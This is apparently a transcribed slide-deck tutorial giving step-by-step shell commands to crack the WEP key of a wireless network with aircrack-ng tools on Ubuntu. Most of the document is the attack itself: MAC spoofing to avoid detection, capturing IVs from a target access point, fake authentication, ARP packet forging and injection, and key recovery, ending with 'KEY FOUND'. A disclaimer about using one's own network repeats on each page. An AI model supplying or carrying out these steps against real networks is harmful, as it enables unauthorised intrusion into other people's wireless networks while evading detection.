How to Crack Wep Key Tutorial

10
Please try this with your own wireless network device, this is against the law and could suffer serious damages against you. Raniver HOW TO CRACK A WEP KEY (TUTORIAL) This tutorial tells you a few single steps to crack a WEP key, the wireless device that it’s used is DWL-G122 ver. B1 on Ubuntu 9.04 (Linux) Before you can use the sentences in this tutorial, install with the synaptic source manager, AIRCRACK-NG and MACCHANGER. Open a new shell and type: 1. airmon-ng, with this you confirm that your device is perfectly connected to your computer, and then you can know the interface and the driver that is using; in this case we use wlan0. 2. airmon-ng stop wlan0, this stops the monitor mode for a while, your device will be disconnected until we can change the MAC address to a faked MAC address. 3. ifconfig wlan0 down, puts the device down 4. macchanger - -mac 00:11:22:33:44:55 wlan0, this change you MAC address for a faked MAC, with this we can prevent our device to be detected.

description

An easy way to crack a wep key on Ubuntu 9.04

Transcript of How to Crack Wep Key Tutorial

Page 1: How to Crack Wep Key Tutorial

Please try this with your own wireless network device, this is against the law and could suffer serious damages against you.

Raniver

HOW TO CRACK A WEP KEY (TUTORIAL)

This tutorial tells you a few single steps to crack a WEP key, the wireless device that it’s

used is DWL-G122 ver. B1 on Ubuntu 9.04 (Linux)

Before you can use the sentences in this tutorial, install with the synaptic source manager,

AIRCRACK-NG and MACCHANGER.

Open a new shell and type:

1. airmon-ng, with this you confirm that your device is perfectly connected to your

computer, and then you can know the interface and the driver that is using; in this case

we use wlan0.

2. airmon-ng stop wlan0, this stops the monitor mode for a while, your device will be

disconnected until we can change the MAC address to a faked MAC address.

3. ifconfig wlan0 down, puts the device down

4. macchanger - -mac 00:11:22:33:44:55 wlan0, this change you MAC address for a faked

MAC, with this we can prevent our device to be detected.

Page 2: How to Crack Wep Key Tutorial

Please try this with your own wireless network device, this is against the law and could suffer serious damages against you.

Raniver

5. airmon-ng start wlan0, this turns on your device and it’s connected again on your

computer enabling the monitor mode that is the one who makes that we can detect

wireless signals and crack a wep key fast.

6. airodump-ng wlan0, with this our device it’s going to detect all the wireless signals

around.

TIP: Take the MAC address that you are going to attack and copy it (ctrl + shift + c)

TIP2: When you have the MAC address press (ctrl + c) to terminate the process

airodump.

Page 3: How to Crack Wep Key Tutorial

Please try this with your own wireless network device, this is against the law and could suffer serious damages against you.

Raniver

7. airodump-ng -c "channel" -w "filename" --bssid "MAC" wlan0, this tells the

behavior of the wireless signal that you are going to attack. The data (IVs) will be

captured in a slow way.

TIP: Keep this shell open and maintain your eyes on the #Data

Page 4: How to Crack Wep Key Tutorial

Please try this with your own wireless network device, this is against the law and could suffer serious damages against you.

Raniver

Open a new shell and type:

8. aireplay-ng -1 0 -a "MAC" -h "faked MAC" -e "ESSID" wlan0, this will send an

authentication of the wireless signal to your device, and it’s going to be associated.

9. aireplay-ng -5 -b "MAC" -h "faked MAC" wlan0, this will capture packets from the

wireless signal, and will make a XOR file that permits that we can build a packet with

another sentence that is packetforge-ng.

TIP: When we have a question “use this packet?” just type “y” and intro.

10. packetforge-ng -0 -a "MAC" -h "faked MAC" -k 255.255.255.255 -l

255.255.255.255 -y ".XOR FILE" -w ARP, this will make the XOR file an ARP file of

packets that it’s going to be transmitted soon. With the ARP file we can insert more

packets and the data will be increased.

Page 5: How to Crack Wep Key Tutorial

Please try this with your own wireless network device, this is against the law and could suffer serious damages against you.

Raniver

11. aireplay-ng -2 -r ARP wlan0, the data(IVs) will be captured in a high way on the shell

that we don’t close, with that we have to wait until we have at least 10000 IVs to use the

next sentence.

TIP: When we have a question “use this packet?” just type “y” and intro.

TIP2: Keep this shell open.

Page 6: How to Crack Wep Key Tutorial

Please try this with your own wireless network device, this is against the law and could suffer serious damages against you.

Raniver

Sending the firsts packets.

Sending 1000 packets.

Page 7: How to Crack Wep Key Tutorial

Please try this with your own wireless network device, this is against the law and could suffer serious damages against you.

Raniver

Sending 10000 packets.

Open a new shell and type:

12. aircrack-ng -b “MAC” “filename”.cap, with this we are going to have the unencrypted

key.

TIP: The filename is the one that you typed on step 7.

TIP2: You have to be patient maybe with 10000IVs it’s not enough to have the

unencrypted key, maybe you should try with more data (IVs).

Page 8: How to Crack Wep Key Tutorial

Please try this with your own wireless network device, this is against the law and could suffer serious damages against you.

Raniver

First TRY, with 10614(IVS)

Page 9: How to Crack Wep Key Tutorial

Please try this with your own wireless network device, this is against the law and could suffer serious damages against you.

Raniver

First try FAILED! Next try with 15000(IVs)

Page 10: How to Crack Wep Key Tutorial

Please try this with your own wireless network device, this is against the law and could suffer serious damages against you.

Raniver

Second TRY, with 15636(IVs), KEY FOUND!

So there we can find the key, remember to be patient and you will have the key.